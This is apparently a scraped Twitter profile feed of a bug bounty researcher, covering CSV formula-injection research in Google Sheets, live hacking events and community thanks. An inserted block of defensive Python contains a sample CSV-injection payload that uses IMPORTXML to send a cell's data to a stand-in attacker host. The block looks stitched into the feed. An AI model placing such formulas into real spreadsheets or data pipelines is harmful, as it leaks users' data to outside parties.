Pinned Tweet
Hx01
580 posts

Hx01
@Hxzeroone
Not evil just misunderstood.
Alcatraz Prison, SF. Joined August 2017
153 Following, 5.3K Followers

@ldionmarcil @sml555_ @codecancare Yes, we had reported issues to such platforms and got them fixed where their connectors and recipes were directly vulnerable.

@Hxzeroone @sml555_ @codecancare Or is the issue here that those automation frameworks (Zapier, Workato, Make) somehow make Sheets evaluate the CSV formulas prior to the user opening the sheet and granting access? Were you able to reproduce this directly, i.e. with a trial on these services?

Hello!
Just published a new research with ( @sml555_ , @codecancare) 🍻
Who Needs A Blind XSS?
hx01.me/hailcsv.htm
#CyberSecurity #BugBounty

This has been a recent implementation in Google Sheets; prior to that there wasn't any warning, it would auto-run once they were implemented.
Also to be noted, if the formulas are allowed once, they are not asked to be accepted again, meaning a sheet that has previously added its own formulas and is ingesting data from attacker-supplied sources would still be vulnerable.
Apart from that, the same can be achieved in Microsoft Excel.
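As an added example (not code from the hailcsv research, nor from Google Sheets or any of the connectors named in this thread), the check a connector or recipe owner would want on data before it is pushed into a sheet: an audit pass that flags formula-like cells, and a neutralising CSV writer. The sample rows, the attacker.example host and all function names are constructed for illustration; IMPORTXML is a real Sheets function of the kind that triggers the "send and receive data from external parties" prompt once the sheet evaluates it.

```python
import csv
import io

# Leading characters that make Excel, Google Sheets and LibreOffice treat a
# cell as a formula (OWASP "CSV Injection" guidance). Tab and carriage return
# are included because some importers strip them and then see the next char.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample: rows as an automation connector might pull them from a
# public form into a spreadsheet. Row 2 carries a formula that would fetch an
# external URL (and leak cell A2 in the query string) once evaluated.
SUBMISSIONS = [
    ["name", "email", "comment"],
    ["Alice", "alice@example.com", "Thanks for the quick reply"],
    ["Bob", "bob@example.com",
     '=IMPORTXML("https://attacker.example/c?d="&A2,"//a")'],
    ["Carol", "carol@example.com", "-1 star, would not buy again"],
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would try to evaluate this cell."""
    return value.startswith(FORMULA_TRIGGERS)


def find_formula_cells(rows):
    """Detection side: (row, col, value) for every cell that looks like a
    formula, 0-based, header row included. Run it on connector input before
    it reaches a sheet, or on an export of a sheet that already ingests
    untrusted data, to see what would run if formulas were ever allowed."""
    hits = []
    for r, row in enumerate(rows):
        for c, cell in enumerate(row):
            if isinstance(cell, str) and is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


def neutralize_cell(value):
    """Prevention side: force text interpretation.

    A leading apostrophe makes Sheets/Excel store the cell as a literal
    string. Embedded double quotes are escaped by the CSV writer below, so a
    value cannot break out of its quoted field. Non-strings pass through.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def to_safe_csv(rows) -> str:
    """Serialise rows with every cell quoted and every formula-like cell
    neutralised; this is what a connector should hand to the spreadsheet."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def parse_csv(text: str):
    """Read a CSV string back into rows (used to verify the output)."""
    return list(csv.reader(io.StringIO(text)))


if __name__ == "__main__":
    for r, c, cell in find_formula_cells(SUBMISSIONS):
        print(f"row {r} col {c}: {cell!r}")
    print(to_safe_csv(SUBMISSIONS))
```

Two caveats a practitioner should keep in mind: the apostrophe prefix also turns legitimate values such as "-1" into text (and some importers display the apostrophe), so apply it only on the untrusted columns if numeric fidelity matters; and neutralising at write time does nothing for a sheet that has already granted formulas access, which is the "allowed once" case above, so the audit pass is worth running on existing sheets too.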

@Hxzeroone @sml555_ @codecancare I can't reproduce this in Google Sheets, getting a pop-up: "Warning: Some formulas are trying to send and receive data from external parties."
Doesn't successful exploitation imply someone manually allowed access, justifying the "social engineering" responses your team got?

Lastly, thank you to all subscribers and everyone who, directly and indirectly, contributed to my journey so far.
Here are some shoutouts:
@d0nutptr @0xAshFox @NahamSec @seclilc @DanielMiessler @Jhaddix @0xtavian @stokfredrik @bsysop @b1tc0de @notshenetworks @drunkrhin0 @Hxzeroone @codingo_ @zseano @AlbonyCal @mcipekci @InsiderPhD @hakluke @corg_e @pry0cc
Hx01 retweeted

I had a great time at @Hacker0x01's H1-4420 in London. Was great working with @TomAnthonySEO, @Hxzeroone, @codecancare and @seanyeoh! This event also produced this tool: github.com/assetnote/surf which led to about $26k worth of bounties at this event.

@alicanact60 @umr4n6 @ArmanSameer95 @infosec_au @TomAnthonySEO @JosipFranjkovic @ryotkak @Rhynorater @itscachemoney @Arl_rose @0xLupin @iambouali It was great meeting y’all as well 🥰

Also, I met amazing people @umr4n6 @ArmanSameer95 @Hxzeroone @infosec_au @TomAnthonySEO @JosipFranjkovic @ryotkak @Rhynorater @itscachemoney @Arl_rose @0xLupin @iambouali and many more! Happy to meet you, everyone. You all are amazing people!


Just participated in a live hacking event with @Hacker0x01 in London🇬🇧! This is my first LHE with HackerOne!
Proud to finish 3rd on the @Zoom leaderboard and 4th overall.
Feeling thrilled and accomplished!
#h14420 #bugbounty


@mcipekci @bugraeskici @bsysop @sw33tLie @codecancare @restr1ct3d @HusseiN98D @dogwhohacks Congratulations 🥳

Also shout out to all these mad lads who helped me on the journey @bugraeskici @Hxzeroone @bsysop @sw33tLie @codecancare @restr1ct3d @HusseiN98D @dogwhohacks and many others whom I missed!

I'm proud to announce that with today's payouts I hit $1M all-time earnings combined from all platforms and external programs I participated in. 3/4 of these earnings come from @SynackRedTeam and the rest from @Bugcrowd, @Hacker0x01 and some good external programs :). #BugBounty

@rez0__ It looks good to me! I'll defer to the OAuth master @Hxzeroone for the final opinion though.
I think the last arrow should go all the way to the user.

The first tweet couldn't fit in all the amazing people @Farah_Hawaa @sh_timmy @vortexau @codingo_ @streaak @iangcarroll @rez0__ @mcipekci

Since we are acknowledging the great relationships we've formed in bug bounties, I'd also like to thank the friends I've made along the way @infosec_au @codecancare @HusseiN98D @sw33tLie @ITSecurityguard @m0chan98 @0xd0m7 @bsysop @d00xing @sml555_ @RelentlessT7
shubs@infosec_au
I've been able to achieve great things through teamwork and greatly respect the following people @rhyselsmore, @HusseiN98D, @fransrosen, @Hxzeroone, @codecancare, @seanyeoh, @samwcyo. We've had a lot of fun together, the bounties don't even matter at some point.

@infosec_au @rhyselsmore @HusseiN98D @fransrosen @codecancare @seanyeoh @samwcyo 💖 Thank you shubs, you've made my day here as well. You have been a great bro, and thank you for being the person I could count on and roast the hell out of at the same time.


Beasts 🔥 @codecancare @infosec_au @Hxzeroone @zseano @rez0__ Eduuu, Patrik, @m0chan98 @mcipekci @rhyselsmore @m4ll0k @Yassineaboukir @PaulosYibelo @hacker_ @pry0cc @akita_zen @snyff @joohoi @fransrosen @brutelogic @s0md3v
HT
Hx01 retweeted

Who is Hx01? 👤
September's Researcher Spotlight with 8+ years of experience hacking!
Check out this impressive #bugbounty journey below! 👣
#BugBountyTips #ItTakesACrowd
bugcrowd.com/blog/researche…

The #H1702 Day 1 leaderboard is live! 👀 Are you following along to see who will compete for @Zoom Vigilante (aka MVH)? leaderboards.hackerone.live/H1-702-day-1

@thedawgyg "Storm Area 51" --> This event in 2019 comes to my mind.
@Hxzeroone Are you planning to raid Area 51 again?
Hx01 retweeted

@Hxzeroone and I somehow broke the internet this week. A total of approximately 200 reports sent so far across #Bugbounty platforms for this 0day. All the giants are affected. I mean it.
Hx01 retweeted

It's finally live. I'm sorry for the time this took!
The workshop I gave at @THREAT_CON is now live on Udemy for a discounted price. The price will go back to $149 at the end of the week. More details to follow.
udemy.com/course/bug-bou…
